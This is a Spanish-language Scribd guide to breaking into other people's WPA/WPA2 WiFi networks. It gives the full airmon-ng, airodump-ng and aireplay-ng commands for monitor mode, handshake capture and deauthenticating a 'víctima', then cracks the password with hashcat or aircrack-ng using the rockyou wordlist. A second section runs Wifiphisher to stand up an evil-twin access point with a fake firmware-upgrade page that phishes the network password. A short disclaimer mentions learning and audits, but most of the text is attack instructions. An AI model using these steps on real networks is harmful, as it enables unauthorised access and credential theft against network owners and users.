0% encontró este documento útil (0 votos)
795 vistas8 páginas

Hackeo de Una Red

Este documento describe los pasos para configurar una tarjeta inalámbrica en modo monitor usando comandos como iwconfig, ifconfig y airmon-ng. Primero se identifica la tarjeta inalámbrica, luego se activa el modo monitor y se configura la interfaz creada (por ejemplo wlan0mon) para funcionar en modo monitor.

Cargado por

Rolax Contreras
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
795 vistas8 páginas

Hackeo de Una Red

Este documento describe los pasos para configurar una tarjeta inalámbrica en modo monitor usando comandos como iwconfig, ifconfig y airmon-ng. Primero se identifica la tarjeta inalámbrica, luego se activa el modo monitor y se configura la interfaz creada (por ejemplo wlan0mon) para funcionar en modo monitor.

Cargado por

Rolax Contreras
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd

Lo primero que necesitamos hacer es saber cual es nuestra tarjeta Wireless

Utilizaremos el siguiente comando : iwconfig

Como referencia usaremos wlan0

Abriremos una terminal y escribiremos los siguientes comandos:

airmon-ng start wlan0

Para activar la placa en modo monitor

ifconfig wlan0mon down

Para desmontar la tarjeta wireless

iwconfig wlan0mon mode monitor

Para activar la tarjeta wireless en modo monitor

ifconfig wlan0mon up

Para montar la tarjeta wireless en modo monitor


Preparar el Adaptador
1. Ahora debes preparar el analizador de paquetes ejecutando el siguiente
comando (recuerda que necesitas privilegios, por tanto usa sudo o
ejecútalos como root):
 airmon-ng
2. Con el comando anterior, podrás observar el nombre del adaptador de red
que tienes (en la columna Interface). Por ejemplo, imagina que es wlan0.
Entonces el siguiente paso es comenzar la monitorización de los paquetes
a través de tu adaptador. Por ejemplo:
 airmon-ng start wlan0
 iwconfig
3. Puedes deshabilitar los mensajes de error para que no los muestre, ya que
puede generar mayor confusión en la salida de resultados. Para ello:
 airmon-ng check kill
4. Es el momento de buscar el nombre de la interfaz de monitorización, que
normalmente tiene nombres como mon0, wlan0mon, etc., y luego habilítala
usando su nombre. Para ello, ejecuta el comando:
 iwconfig
 airmon-ng wlan0mon
5. Usando el nombre de la interfaz monitor que has activado anteriormente,
haz que busque redes inalámbricas a tu alcance con (recuerda siempre
usar la interfaz con el nombre correcto en tu caso y privilegios):
 airodump-ng wlan0mon
Escoger la Red WiFi a descifrar
 Mostrará una lista con los routers WiFi a tu alcance a los que su cobertura
llega a tu tarjeta de red. Cada línea es un dispositivo, busca el nombre del
que quieras. Deberían usar WPA/WPA2 para que funcione. Te tienes que
fijar en dos columnas, la MAC que es la llamada BSSID, y el canal, que es
el número de la columna CH.
1. Teniendo esos dos datos en tu poder, lo siguiente es ejecutar el comando
siguiente con esos valores. Por ejemplo, imagina que la MAC es
90:61:06:CC:DA:0F y que el canal es 6 (recuerda sustituir la interfaz por el
nombre del adaptador que quieras y la ruta por el directorio donde quieras
que se guarde el fichero .cap con la captura):
 airodump-ng -c 6 –bssid 90:61:06:CC:DA:0F -w /root/Desktop/ wlan0mon
2. Solo tienes que esperar a que se produzca el handshake, mostrando un
mensaje tipo «WPA handshake», si no se produce, podrías usar aireplay-
ng para desautenticar a la víctima y que tenga que volverse a logear en su
red y capturar así la contraseña introducida.Solo si lo primero no surte
efecto, para forzar el handshake podrías usar el siguiente comando (la
segunda MAC es la que aparece más a la derecha del router víctima que se
mostraba en pasos previos):
 aireplay-ng -0 3 -a 0:61:06:CC:DA:0F -c 64:BC:0C:48:90-FF wlan0mon
3. Deberías ver un .cap en la ruta especificada. Desplázate hasta allí con el
comando cd, y dentro del directorio donde lo hayas metido, convierte el .cap
en un .hccapx:
 cap2hccapx.bin nombre.cap nombre.hccapx
4. Por último, para descifrar la contraseña del archivo anterior, puedes usar
aircrack-ng si tu equipo no cuenta con GPU, o usar naive-hashcat para
agilizar el trabajo y obtenerla más rápidamente. Si el programa no viene con
la distro preinstalado, puedes instalarlo desde aquí.
5. Según el camino tomado, puedes tener:
 Para usar Hashcat, ejecuta lo siguiente con las variables de entorno
e iniciando el script:
 HASH_FILE=nombre.hccapx
 POT_FILE=nombre.pot
 HASH_TYPE=2500
 ./naive-hashcat.sh
 Para aircrack-ng deberías hacer lo siguiente, descargando un
diccionario típico como rockyou y ejecutar aricrack-ng (recuerda
sustituir por los nombres de archivo, MAC, y datos adecuados, así
como -a para WPA y -a2 para WPA2):
 curl -L -o rockyou.txt https://github.com/brannondorsey/naive-
hashcat/releases/download/data/rockyou.txt
 aircrack-ng -a2 -b 90:61:06:CC:DA:0F -w rockyou.txt nombre.cap
6. Espera a que termine de descifrar la contraseña y estará disponible en
nombre.pot del directorio de naive-hashcat. En el caso de aircrack-ng, se
mostrará un mensaje KEY FOUND [contraseña] con la contraseña
mostrada en texto plano entre []. Sé paciente, según la fortaleza de la
contraseña podría tardar minutos, horas o semanas.

Otras guías interesantes:


WiFiphisher: conseguir contraseñas
WiFi protegidas por WPA y WPA2

Las contraseñas WEP son vulnerables, tampoco son demasiado


seguras las WPA. Supuestamente, las WPA2 ofrecen una protección
bastante segura, pero ni el mejor sistema de seguridad puede hacer
nada frente a la ingeniería social y a ataques como los de phishing
donde es la propia víctima la que te termina entregando la contraseña
en bandeja.
Herramientas como Wifiphisher son precisamente para ello. Para
poder obtener contraseñas de redes WiFi protegidas
mediante protocolos WPA/WPA2 que, en principio, serían robustas.
Pero permite automatizar ataques phishing personalizados para que
te entreguen las credenciales y puedas tener acceso a la red sin
problemas.
Desde este blog no incitamos a realizar prácticas delictivas con este tipo de software.
Simplemente es una guía con fines de aprendizaje o para hacer tus propias auditorías
WiFi. Cualquier acto delictivo lo harás bajo tu propia responsabilidad y no nos
hacemos cargo de ello…
WEB vs WPA
Antes de nada deberías conocer estos métodos de producción para redes
inalámbricas. WEP (Wired Equivalent Privacy) es uno de los menos seguros en la
actualidad, y que se considera vulnerable ahora y deberías cambiar a WPA/WPA2. WEP
suele estar presente en algunos routers antiguos, así que si ese es tu caso, deberías revisarlo.
Desde hace años, los ciberatacantes lograron romper su cifrado fácilmente con herramientas
gratuitas. Por eso, en 2005, el FBI hizo una demostración pública de su fragilidad para
concienciar a la gente. Wi-Fi Alliance haría cambios en 2004 y se movería hacia los
nuevos WPA/WPA2. Más actualmente se trabaja en WPA3, un novedoso sistema mucho
más robusto que el actual WPA2.
Entre las mejoras de WPA3 tiene protección contra ataques de fuerza bruta/diccionario,
incluso para usuarios con contraseñas débiles. También aumenta la privacidad de la red
pública cifrando los datos de forma individualizada, más seguridad para dispositivos de
IoT, y cifrado más fuerte de 192 bits.

Wifiphisher
Wifiphisher es un software capaz de realizar un ataque por ingeniería social, tipo phishing,
en el que será la víctima la que entregue la contraseña de la WiFi sin necesitar ataques de
fuerza bruta u otras artimañas. Y lo puede conseguir de una forma sencilla incluso en claves
WPA/WPA2 que se suponen que son seguras.
En este caso, usará un AP idéntico al original, pero es falso. Entonces realiza un ataque
para desconectar al usuario de su Wi-Fi de su AP verdadero. Cuando vuelve a autentificarse
con su AP falso con el mismo SSID y su contraseña, se capturará y podrá ser tuya. Además,
luego dejará que siga usando el AP falso con normalidad para que no sospeche.

Procedimiento para conseguir la contraseña


Para poder usar Wifiphisher, deberías tener unos requisitos previos
para comenzar, y seguir unos sencillos pasos…
Requisitos
Para comenzar, deberías contar con:
 Distribución Kali Linux. No la tienes que instalar en tu equipo, puedes usarla en modo
Live.
 2 adaptadores WiFi (recomendado). Uno se debe usar como punto de acceso (PA) y el otro
como adaptador WiFi que soporte el modo monitor. Si solo usas una, entonces tendrás que
usar la opción -nojamming para destactivar la desautenticación.
 Proximidad con la red WiFi que quieres auditar.
Pasos
Para comenzar y obtener la contraseña WPA/WPA2 de una red WiFi
protegida, tan solo sigue estos pasos:
1. Descargar e instala Wifiphisher gratuitamente desde GitHub. Puedes usar los siguientes
comandos desde el terminal de tu Kali Linux:
 git clone https://github.com/wifiphisher/wifiphisher.git
 cd wifiphisher
 sudo python setup.py install
 Si aparece un mensaje sobre el paquete hostapd, tan solo acepta pulsando Y.
2. Ahora comprueba que se ha instalado correctamente, para ello, ejecuta Wifiphisher para
que muestre la ayuda:
 wifiphisher -h
3. Para generar una red WiFi abierta con el mismo ESSID, ejecuta el siguiente comando (para
una sola tarjeta de red):
 wifiphisher -nojamming
4. Verás las redes disponibles a tu alcance. Ahora elige la red objetivo de la que quieres
obtener la contraseña usando las flechas arriba y abajo del teclado. Cuando estés encima,
pulsa INTRO.
5. En la siguiente pantalla elige la 2, para seleccionar Firmware Upgrade Page.
6. Ahora deja que la herramienta haga su magia y capture la contraseña.

Por cierto, las plantillas disponibles son limitadas, se encuentran en la


ruta donde hayas instalado Wifiphisher en el subdirectorio
../wifiphisher/data/phishing-pages/. Allí podrás modificar las
existentes si tienes conocimientos de programación o descargar las
páginas que quieras, editar el HTML para adaptarlo a esta app e
introducirlas en esa ruta para que las pueda usar…

También podría gustarte